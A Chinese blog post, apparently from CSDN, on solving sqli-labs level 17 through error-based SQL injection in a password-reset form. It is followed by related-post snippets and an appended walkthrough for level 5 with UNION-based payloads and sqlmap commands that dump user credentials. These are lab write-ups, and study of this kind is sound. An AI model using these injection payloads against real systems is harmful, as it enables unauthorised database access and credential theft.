sql_labs第十七关

最新推荐文章于 2025-05-21 11:34:36 发布
原创 最新推荐文章于 2025-05-21 11:34:36 发布 · 461 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#mysql

做到了sql_labs的第十七关,之前的做的关卡都是可以经过一些尝试通过的,但是这关尝试了很多东西还是没有报错注入
只有通过代码审计查看本关的注入原理了

首先是看懂这个input_check()函数
在这里插入图片描述
之后我们要看看到这个,也是本题的解题点
在这里插入图片描述
这里我们可以看到,首先进行上传数据的判断,但是$uname是通过上面的input_check函数进行了相关的过滤,所以在第一个文本框是没办法输入的,但是密码并没有进行相关的过滤。
所以本关的重点是在密码框这里。
在这里插入图片描述
可以看出在得到row变量的之后,如果不为空,代码将要使用我们的passwd替换password
所以我们本次使用的是报错注入

这里会有两个报错输入函数updatexml()和extractvaule()
这两个解释大家可以在这里看
https://blog.csdn.net/zpy1998zpy/article/details/80631036

在这里插入图片描述
第一个文本框使用的是真实的用户名
第二个代码段如图
爆破数据库名

1' and extractvalue(2,concat('^',(select database()),'^'))#

在这里插入图片描述

爆破表明

1' and extractvalue(1,concat('^',(select group_concat(table_name) from information_schema.tables where table_schema=database()),'^'))#

之后还是按照前面几关的步骤进行爆破

sqlilabs17
wh1sper、的博客
04-29 1399
sqlilabs17一、分析二、手注 一、分析 这题目叫做基于报错的更新查新。 遇事不决,就直接看源码。 通过源码我们得知当我们输入数据进去时,会先查询users表与我们输入进去的用户名对比。 如果没有这个用户,就会告诉你。(这肯定忍不了) 相反他会检查用户名。 在check_input中,我贴了函数的链接,师傅们比我总结的详细。 get_magic_quotes_gpc()函数 ctype_digit()函数 二、手注 ...
SQL-Labs靶场“36-37”教程
钟言的博客
03-19 3706
本篇为SQL-Labs靶场的36到37的通教程,详细内容包含了:一、36 GET单引号宽字节注入1、源码分析2、联合查询注入3、updatexml报错注入4、floor报错注入37POST单引号宽字节注入1、源码分析2、联合查询注入3、updatexml报错注入4、floor报错注入等内容
SQL-labs的第17——报错注入(updatexml)
qq_73393033的博客
07-20 621
这一的网站是用来修改密码的,所以数据库会执行update这种查询方式,而不是select这种查询方式。我们发现用户名这一框输入数据不行,会进行过滤。所以我们这次在密码这一框中进行注入。
sqli-labs第十七——POST注入点
最新发布
2403_88102829的博客
05-21 233
测试四个代码,页面均无反应所以我们更换注入点的位置 ,再密码框注入第二行成功得到不同的回显,得出结论:注入点在密码栏, 是单引号字符型闭合成功。
SQLI-labs-第十七
weixin_54055099的博客
05-16 1412
Sqli-labs第十七,二次注入、报错注入
Sqlilabs-17
KAKA的博客
07-07 944
来到了 17 ,从这开始刚学习需要借助源码来配合学习,本学习内容是 update 内容 从源码中可以看到,开发者的意图流程是: 首先查询用户名相匹配的 users 表中 数据,所以这里如果需要注入首先得有一个在数据库中已经有了的用户名,若是现实挖掘漏洞过程中这,如果可以,可以先自己先注册一个,这下在数据库中就躺着了一个可利用的用户名和密码…,没有的话可以盲猜,如一般都有 admin guest等等可以直接利用的… 继续往下看源码,你会发现 username 身上加了个check_input,转到
sqli-labs 第十七
qq_64302290的博客
05-13 1194
(2)当前面的输入的密码 为整数时,之所以可以被执行,是因为当我们输入的为整数时相当与给后面的语句加上了一个括号,并且有限执行括号中的内容。可以发现,这里使用update语句来修改用户的密码,并且对我们输入的用户名进行了过滤但并没有对密码进行过滤。大家可以看到在最后注入具体值的时候我们使用的是floor进行注入,是因为当我们使用updatexml进行注入时会爆下面的问题: 等我查阅资料后回来改正。经过我们的测试,当在密码出输入一个单引号时就会出现报错,对此注入点可能就在该位置。我们接着上面测试注入表名。
【网络安全】-sql注入实战-sql-labs(1~10)
weixin_65311462的博客
09-01 1243
id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='数据库名' and table_name='表名' -- +id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='数据库名' -- +3.4 爆数据 :?
SQL注入:sqli-labs靶场通(第十五——第二十
l258282的博客
12-14 956
使用1 or 1=1 和 1 or 1=2发现页面正常。输入1’发现并没有报错,输入1"发现也没有报错。1'1"这次连闭合报错的信息都没有了,所以不能用报错注入了。这里可以用布尔盲注或时间盲注。
SQL-Labs靶场“46-50”教程
热门推荐
钟言的博客
02-24 1万+
本篇为SQL-Labs靶场的第46到50教程,详细内容包含了:四十六 ORDER BY数字型注入 1、源码分析 2、rand()盲注 3、if语句盲注 4、时间盲注 5、报错注入 6、Limit注入 四十七 ORDER BY单引号报错注入 1、源码分析 2、报错注入 3、时间盲注 三、四十八 ODRER BY数字型盲注 1、源码分析 2、rand()盲注 3、if语句盲注 4、时间盲注 四、四十九 ORDER BY单引号盲注1、源码分析 2、时间盲注 五、五十 ORDER BY数字型堆叠注等
Sql-labs 靶场搭建及通
m0_74825074的博客
01-21 1278
该语句的意思是查询information_schema数据库下的tables表里面且table_schema字段内容是security的所有table_name的内容。该语句的意思是查询information_schema数据库下的columns表里面且table_users字段内容是users的所有column_name的内。爆出库是 ctfshow,ctftraining,information_schema,mysql,performance_schema,security,test。
sqli-labs第十七
m0_73248913的博客
02-11 408
sqli-labs第十七教程
sql-labs11-17
qq_51954912的博客
05-23 218
sql-labs sql-labs从第11开始就是post型了,具体的闭合原理我还不太懂,据说和get型差不多。反正我的理解就是,不管username还是password,只要构成闭合那应该都可以执行后面的语句。 第11 我发现 不管是username还是password构成的闭合都可以登陆上去。 那么就开始爆库了 之后就跟第一联合注入的步骤差不多了 爆字段 -1' order by 2# 即首先搞一个不存在的用户名。然后查询字段。 爆库名 -1' union select 1,datab
sqli-labs(十七)
weixin_30421525的博客
09-06 100
第五十四: 这大概意思就是尝试次数不能多于十次,必须十次之类查询处特点的key。 第一次:输入单引号报错 第二次:输入双引号不报错 说明后台是单引号进行的拼凑 第三步:这里应该是判断列,用order by来判断。 这里已知是三行(手动滑稽) 第四步:?id=-1' union select 1,group_concat(table_name),3 from information...
sqli-labs 17
m0_69548793的博客
08-27 1409
sqli-labs 17
sqli-labs第十七详解
金 帛的博客
04-26 4957
sqlilabs第十七详解
sqli-labs(十七)
qq_65950075的博客
05-05 792
这一跟前面的卡都不一样,是全新的卡,页面是一个密码重置页面,需要输入用户名,然后输入新的密码,就会把我们的旧密码替换掉。所以就会用到数据库的update更新数据,不再是前面的查询数据,所以之前的联合注入和布尔盲注以及时间盲注都不能用了。这里我们要用到之前使用过的报错注入。所以我们使用mid()函数来截取,因为是从32位开始不能看到,所以我们从第32位开始截取,截取后32位。这里要先输入正确的用户名,验证成功后才会把新密码替换,所以我们输入。但是回显并没有完全,因为报错回显只能回显32位。
sqli-labs11-17详解
weixin_43061418的博客
08-30 477
这几是利用post请求注入,相知识和工具有: hackbar,可在GitHub下载不收费的 使用的注释符为# 知道sql语句中闭合使用,让语句组合连接正确 报错盲注的updatexml函数,还有extractvalue函数,name_const函数,子查询,可以自行了解一下原理和使用方法 第11 看源码 知道注入方式 这是当数据库里面有admin时可以直接登录,如果没有的话 接下来就使用order by和联合注入,直接在登录框输入 第12 登陆上了,后面的操作跟11一样 第
sql-labs第5
04-03
<think>好的,我需要帮助用户找到SQL-Labs第5的解决方案。首先,我需要回顾用户提供的引用内容,看看是否有直接相的信息。用户提供的引用1到5主要涉及第46-50、29-31、第十一第十七等,但没有明确提到第五。不过,可能有一些通用的技巧或方法可以应用。 首先,SQL-Labs卡通常涉及不同类型的SQL注入攻击,比如联合查询、报错注入、布尔盲注、时间盲注等。第5可能属于基础卡,可能涉及GET请求的单引号注入。根据常见的卡设计,第五可能类似于前几的结构,但可能有不同的闭合方式或过滤规则。 我需要参考用户提供的引用内容中的方法,例如引用1中的ORDER BY注入,引用2中的联合查询和group_concat的使用,引用3中的POST型注入,引用4中的HTTP参数污染和WAF绕过,引用5中的sqlmap使用。虽然这些引用不直接针对第五,但可能提供通用的解题思路。 接下来,我需要构建可能的步骤:确定注入点、判断闭合方式、确定列数、联合查询获取数据。可能涉及单引号闭合,使用联合查询注入,利用报错或布尔盲注。例如,用户可能在URL中使用?id=1'进行测试,观察是否有报错,然后使用--+注释后续内容。确定列数后,联合查询获取数据库信息,如数据库名、表名、字段内容。 同时,可能需要使用sqlmap工具自动化测试,如引用5中提到的使用-r参数读取请求文件,指定数据库和表进行爆破。此外,引用4提到的HTTP参数污染可能用于绕过某些过滤,但第五可能不需要这么复杂的技巧,因为它属于早期卡。 总结,虽然没有直接的第五信息,但根据常见方法和引用中的类似步骤,可以推断出解决方案。需要确保步骤清晰,包括闭合方式判断、列数确定、联合查询构造,以及使用工具的方法。同时,提醒用户注意实际测试中的变量,如过滤规则和闭合符号的变化。</think>### SQL-Labs第5解决方案分析 SQL-Labs第5通常属于**基于GET请求的单引号字符型注入**,需要通过联合查询(Union Select)获取敏感信息。以下是详细步骤: --- #### **1. 判断注入点及闭合方式** - 输入`?id=1'`测试闭合符号: ```sql ?id=1' --+ ``` 若页面返回正常,说明闭合方式为**单引号**,且注释符`--+`成功闭合语句[^1][^4]。 --- #### **2. 确定字段数(列数)** 使用`ORDER BY`逐次测试列数: ```sql ?id=1' ORDER BY 3 --+ --页面正常 ?id=1' ORDER BY 4 --+ --页面错误 ``` 说明当前表有**3列**[^2]。 --- #### **3. 联合查询注入** 构造联合查询语句,探测回显位: ```sql ?id=-1' UNION SELECT 1,2,3 --+ ``` 若页面显示`2`或`3`,表示第2、3列为回显位[^4]。 --- #### **4. 获取数据库信息** 通过回显位提取数据库名、表名、字段数据: - **当前数据库名**: ```sql ?id=-1' UNION SELECT 1,database(),3 --+ ``` 输出示例:`security`。 - **爆表名**: ```sql ?id=-1' UNION SELECT 1,group_concat(table_name),3 FROM information_schema.tables WHERE table_schema=database() --+ ``` 输出示例:`users,emails`[^5]。 - **爆字段名**: ```sql ?id=-1' UNION SELECT 1,group_concat(column_name),3 FROM information_schema.columns WHERE table_name='users' --+ ``` 输出示例:`id,username,password`[^2][^5]。 --- #### **5. 提取用户数据** 获取`users`表中的账户密码: ```sql ?id=-1' UNION SELECT 1,group_concat(username,0x3a,password),3 FROM users --+ ``` 输出示例:`admin:5f4dcc3b5aa765d61d8327deb882cf99`(即`admin:password`的MD5值)[^5]。 --- #### **6. 使用SQLMap自动化注入** 若手动注入困难,可通过SQLMap自动化操作: 1. 保存请求为`1.txt`(包含GET请求的URL和参数)。 2. 执行命令爆破数据: ```bash sqlmap -r 1.txt --dbs # 爆破数据库 sqlmap -r 1.txt -D security -T users --dump # 提取用户表数据 ``` 参考引用[5]中的参数格式。 --- ###
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值